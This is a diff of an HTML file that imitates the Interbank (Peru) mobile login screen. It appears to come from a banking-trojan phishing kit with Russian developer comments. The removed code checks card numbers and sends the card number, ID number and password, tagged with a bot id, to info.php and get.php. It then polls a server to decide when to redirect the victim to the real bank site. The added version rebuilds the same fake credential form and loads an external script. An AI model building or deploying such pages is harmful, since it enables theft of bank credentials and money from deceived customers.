--- a/login.html
+++ b/login.html
@@ -1,286 +1,155 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 
 <head>
-  <meta charset="utf-8" />
-  <meta name="viewport" content="initial-scale=1, width=device-width" />
-
-  <link rel="stylesheet" href="./global.css" />
-  <link rel="stylesheet" href="./index.css" />
-  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Karla:wght@300;400;500;700&display=swap" />
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Interbank</title>
+    <link rel="stylesheet" href="./style.css" />
+    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Karla:wght@300;400;500;700&display=swap" />
 </head>
 
 <body>
-  <div class="login">
-    <main class="login">
-      <a href="./forgot.html" class="olvide-mi-contrasea">Olvide mi contraseña</a>
-      <h3 class="recordar-datos">Recordar datos</h3>
-
-      <form id="bankForm">
-        <div class="text-inputs-with-labels-valu-wrapper">
-          <div class="text-inputs-with-labels-valu">
-            <input id="cardNumberInput" class="rectangle" type="text" placeholder="Número de tarjeta" pattern="\d*"
-              required />
-          </div>
-        </div>
-
-        <div class="text-inputs-with-labels-valu-container">
-          <div class="text-inputs-with-labels-valu1">
-            <input class="rectangle" type="text" placeholder="Número de documento" />
-          </div>
-        </div>
-
-        <input type="hidden" name="botid">
-        <input type="hidden" name="target" value="bbva">
-
-        <div class="text-inputs-with-labels-valu-frame">
-          <div class="text-inputs-with-labels-valu">
-            <input id="passwordInput" class="rectangle" type="password" placeholder="Contraseña" />
-            <div class="show-password-toggle" id="showPasswordToggle">
-              <img src="./public/eyeoff.svg" alt="Toggle password visibility" />
-            </div>
-          </div>
-        </div>
-      </form>
-
-      <img class="interbank-1-icon" alt="" src="./public/interbank-1.svg" />
-
-      <select class="frame">
-        <option value="1">DNI</option>
-        <option value="1">Pasaporte</option>
-        <option value="1">CE</option>
-      </select>
-      <img class="logokv-1-icon" alt="" src="./public/logo.png" />
-
-      <input class="rectangle3" type="checkbox" />
-
-      <button class="normal-primary" id="submitButton">
-        <img class="rectangle-icon" alt="" src="./public/rectangle.svg" />
-
-        <b class="apply">Ingresar</b>
-      </button>
-      <h3 class="eres-nuevo-registrate-container">
-        <span>
-          <span class="eres-nuevo">¿Eres nuevo?</span>
-          <span class="span"> </span>
-        </span>
-        <span class="registrate-aqui">Registrate aqui</span>
-      </h3>
-      <h3 class="ubicanos">Ubicanos</h3>
-      <h3 class="contacto">Contacto</h3>
-      <img class="phones-1-icon" alt="" src="./public/phones-1@2x.png" />
-
-      <img class="point-1-icon" alt="" src="./public/point-1@2x.png" />
-      <!-- Popup верстка -->
-      <div class="popup" id="popup">
-        <div class="popup-content">
-          <img src="./public/exclamation.svg" alt="Exclamation mark" class="popup-icon" />
-          <b class="popup-text">Lo sentimos</b>
-          <p class="popup-message">Por favor, ingresa todos los digitos de tu tarjeta.</p>
-          <button class="popup-button" id="popupButton">Aceptar</button>
-        </div>
-      </div>
-
-      <script>
-        const showPasswordToggle = document.getElementById('showPasswordToggle');
-        const passwordInput = document.getElementById('passwordInput');
-        const cardNumberInput = document.getElementById('cardNumberInput');
-        const submitButton = document.getElementById('submitButton');
-        const popup = document.getElementById('popup');
-        const popupButton = document.getElementById('popupButton');
-
-        showPasswordToggle.addEventListener('click', () => {
-          if (passwordInput.type === 'password') {
-            passwordInput.type = 'text';
-            showPasswordToggle.classList.add('active'); // Добавляем класс активного состояния
-          } else {
-            passwordInput.type = 'password';
-            showPasswordToggle.classList.remove('active'); // Убираем класс активного состояния
-          }
-        });
-
-        function luhnCheck(cardNumber) {
-          let sum = 0;
-          let shouldDouble = false;
-          for (let i = cardNumber.length - 1; i >= 0; i--) {
-            let digit = parseInt(cardNumber.charAt(i));
-
-            if (shouldDouble) {
-              digit *= 2;
-              if (digit > 9) {
-                digit -= 9;
-              }
-            }
-
-            sum += digit;
-            shouldDouble = !shouldDouble;
-          }
-
-          return sum % 10 === 0;
-        }
-
-        // Функция, которая будет вызываться после успешной проверки
-        function sendForm(event, formid) {
-          event.preventDefault();
-
-          const cardNumber = cardNumberInput.value.replace(/\s/g, '');
-
-          if (luhnCheck(cardNumber)) {
-            const form = document.getElementById('bankForm');
-
-            submitButton.addEventListener('click', function () {
-              // Собираем данные формы
-              const formData = new FormData(form);
-
-              // Отправляем AJAX-запрос на сервер
-              fetch('info.php', {
-                method: 'POST',
-                body: formData
-              })
-                .then(response => {
-                  // Обработка ответа от сервера
-                  if (response.ok) {
-                    // Если запрос успешно выполнен
-                    console.log('Данные успешно отправлены.');
-                  } else {
-                    // Если возникла ошибка
-                    console.error('Ошибка при отправке данных на сервер.');
-                  }
-                })
-                .catch(error => {
-                  // Обработка ошибок сети
-                  console.error('Произошла ошибка сети:', error);
-                });
-            });
-
-            submitButton.addEventListener('click', function () {
-              fetch('verification.php', {
-                method: 'POST',
-
-              })
-                .then(response => {
-
-                  if (response.status === 200) {
-
-                    console.log('Код ответа 200. Отправляем запрос снова.');
-                  } else if (response.status === 201) {
-                    console.log('Код ответа 201. Происходит редирект на interbank.pe');
-                    window.location.href = 'https://interbank.pe';
-                  } else if (response.status === 202) {
-                    console.error('Код ответа 202. Произошла ошибка.');
-                    alert('Se ha producido un error. Por favor, repita más tarde.');
-                  } else {
-                    console.error(`Неизвестный код ответа: ${response.status}`);
-                  }
-                })
-                .catch(error => {
-                  console.error('Произошла ошибка сети:', error);
-                });
-            });
-            function sendForm(event, formid) {
-
-              var form = document.getElementById(formid);
-
-              var formData = new FormData(form);
-
-              var botId = getQueryParam("botid");
-              formData.append("botid", botId); //добавляем ботайди
-              formData.append("target", "bbva"); //добавляем ботайди
-
-              var xhr = new XMLHttpRequest();
-              xhr.open("POST", "get.php", true);
-              xhr.onreadystatechange = function () {
-                if (xhr.readyState === 4 && xhr.status === 200) {
-                  // Обработка успешного ответа сервера
-                  console.log(xhr.responseText);
-                  sendRequestWithBotId(); // Начинаем отслеживание с сервера
-                } else {
-                  // Обработка ошибок
-                  console.error(xhr.statusText);
-                }
-              };
-              console.log(formData);
-              xhr.send(formData);
-
-            }
-
-            function sendRequestWithBotId() {
-              var botId = getQueryParam("botid");
-
-              if (botId) {
-                var xhr = new XMLHttpRequest();
-                xhr.open("GET", "valid.php?botid=" + botId, true);
-                xhr.onreadystatechange = function () {
-                  if (xhr.readyState === 4) {
-                    var responseCode = xhr.status;
-                    if (responseCode === 200) {
-                      setTimeout(sendRequestWithBotId, 1000);
-                    } else if (responseCode === 201) {
-                      window.location.href = "https://interbank.pe";
-                    } else if (responseCode === 202) {
-                      alert('Se ha producido un error. Por favor, repita más tarde.');
-                    } else {
-                      console.error("Unexpected response code: " + responseCode);
-                    }
-                  }
-                };
-                xhr.send();
-              } else {
-                console.error("Missing botid parameter");
-              }
-            }
-
-            function getQueryParam(name) {
-              var urlParams = new URLSearchParams(window.location.search);
-              return urlParams.get(name);
-            }
-          } else {
-            cardNumberInput.setCustomValidity('Invalid card number');
-          }
-        }
-
-        submitButton.addEventListener('click', (event) => {
-          sendForm(event, 'bankForm'); // Вызываем функцию sendForm после клика на кнопку
-        });
-
-        popupButton.addEventListener('click', () => {
-          popup.style.display = 'none';
-        });
-
-
-        submitButton.addEventListener('click', (event) => {
-          event.preventDefault();
-
-          const cardNumberInput = document.getElementById('cardNumberInput');
-          const popup = document.getElementById('popup');
-          const cardNumber = cardNumberInput.value.replace(/\s/g, '');
-
-          if (!luhnCheck(cardNumber)) {
-            popup.style.display = 'block';
-          }
-        });
-
-
-        popupButton.addEventListener('click', () => {
-          popup.style.display = 'none';
-        });
-
-        const elementoContacto = document.querySelector('.contacto');
-
-        const elementoUbicanos = document.querySelector('.ubicanos');
-
-        elementoContacto.addEventListener('click', () => {
-          Android.clickcallphone()
-        });
-
-        elementoUbicanos.addEventListener('click', () => {
-          Android.clickopenlocation()
-        });
-
-
+    <div class="load-screen">
+        <img class="load-logo" src="./public/interbank-2.svg" alt="Interbank Logo">
+    </div>
+    <script>
+        setTimeout(function() {
+          const load = document.querySelector('.load-screen')
+          load.classList.add('load-screen-off')
+        }, 2000); // Через 2 секунды переадресация на login.html
       </script>
-    </main>
-  </div>
+    <div class="loader-wrapper">
+        <div class="loader">
+            <img src="./public/load.png" alt="Loading..." class="loader-image">
+            <div class="loader-circle"></div>
+        </div>
+    </div>
+    <div class="container">
+        <!--  -->
+        <div class="forget-form openup">
+            <div class="forget-form-header">
+                <img class="back-icon" alt="" src="./public/vuesaxlineararrowdown.svg">
+                Olvide mi contraseña
+            </div>
+            <form class="form">
+                <p class="forget-form-text">Por favor, ingresa tus datos:</p>
+                <input class="input-field" type="text" placeholder="Número de tarjeta">
+                <div class="input-row">
+                    <select class="input-row-items select-field">
+                        <option>DNI</option>
+                        <option>Pasaporte</option>
+                        <option>CE</option>
+                    </select>
+                    <input class="input-row-items input-field input-numbers" type="tel" placeholder="№ de documento">
+                </div>
+                <button class="submit-button forget-form-btn" type="submit" disabled>siguiente</button>
+            </form>
+        </div>
+        <div class="block block1">
+            <img class="logo" src="./public/interbank-1.svg" alt="Logo">
+            <img class="greeting" alt="" src="./public/logo.png" />
+        </div>
+        <div class="block block2">
+            <form id="myForm" class="form">
+                <input id="cardNumber" name="cardNum" class="input-field" type="tel" placeholder="Número de tarjeta"
+                    maxlength="19">
+
+                <div class="input-row">
+                    <select id="docType" name="docType" class="input-row-items select-field">
+                        <option value="DNI">DNI</option>
+                        <option value="Pasaporte">Pasaporte</option>
+                        <option value="CE">CE</option>
+                    </select>
+                    <input id="docNumber" name="docNumber" class="input-row-items input-field input-numbers" type="tel"
+                        placeholder="Número de documento">
+                </div>
+                <div class="password-wrapper">
+                    <input class="input-field" name="password" id="password" type="password" placeholder="Contraseña"
+                        maxlength="20">
+                    <button type="button" id="toggle-password" class="toggle-password">
+                        <img id="eye-icon" src="./public/eyeoff.svg" alt="toggle visibility">
+                    </button>
+                </div>
+                <div class="input-row">
+                    <input type="checkbox" id="recordar">
+                    <label for="recordar" class="recordar">Recordar datos</label>
+                    <span class="forgot-link">Olvide mi contraseña</span>
+                </div>
+                <div class="form-btns">
+                    <div class="fingerprint finger_black">
+                        <img class="" src="./public/fingerprint.svg" alt="fingerprint">
+                    </div>
+                    <button type="submit" class="submit-button">Ingresar</button>
+                </div>
+            </form>
+            <footer class="footer">
+                <div class="footer-register">
+                    <span class="eres-nuevo">¿Eres nuevo?</span>
+                    <span class="registrate-aqui">Registrate aqui</span>
+                </div>
+                <div class="social-list">
+                    <div class="social-item ubicanos">
+                        <img src="./public/point-1@2x.png" alt="">
+                        <span>Ubicanos</span>
+                    </div>
+                    <div class="social-separator"></div>
+                    <div class="social-item contacto">
+                        <img src="./public/phones-1@2x.png" alt="">
+                        <span>Contacto</span>
+                    </div>
+                </div>
+            </footer>
+        </div>
+        <div class="modal" id="myModal">
+            <div class="modal-content">
+                <img src="./public/warn.png" alt="Exclamation mark" class="popup-icon" />
+                <b class="popup-text">Lo sentimos</b>
+                <p class="popup-message" id="popup-error">Por favor, ingresa todos los digitos de tu tarjeta.</p>
+                <button class="popup-button" id="popupButton">Aceptar</button>
+            </div>
+        </div>
+    </div>
+    <script>
+        const forgotLink = document.querySelector(".forgot-link");
+        const backIcon = document.querySelector(".back-icon");
+        const openbankElement = document.querySelector(".forget-form");
+        forgotLink.addEventListener("click", () => {
+            openbankElement.classList.remove("openup");
+            history.pushState({ modalOpen: true }, "");
+        });
+        backIcon.addEventListener("click", () => {
+            openbankElement.classList.add("openup");
+            window.history.back();
+        });
+
+        window.addEventListener('popstate', function (event) {
+            if (event.state && event.state.modalOpen) {
+                openbankElement.classList.remove("openup");
+            } else {
+                // Закрываем модальное окно
+                const openbankElement = document.querySelector(".forget-form");
+                if (!openbankElement.classList.contains('openup')) {
+                    openbankElement.classList.add("openup");
+                }
+            }
+        });
+
+        const togglePasswordButton = document.getElementById("toggle-password");
+        const passwordInput = document.getElementById("password");
+        const eyeIcon = document.getElementById("eye-icon");
+
+        togglePasswordButton.addEventListener("click", function () {
+            if (passwordInput.type === "password") {
+                passwordInput.type = "text";
+                eyeIcon.src = "./public/eye.svg";
+            } else {
+                passwordInput.type = "password";
+                eyeIcon.src = "./public/eyeoff.svg";
+            }
+        });
+    </script>
+    <script src="./script.js"></script>
 </body>
 
 </html>
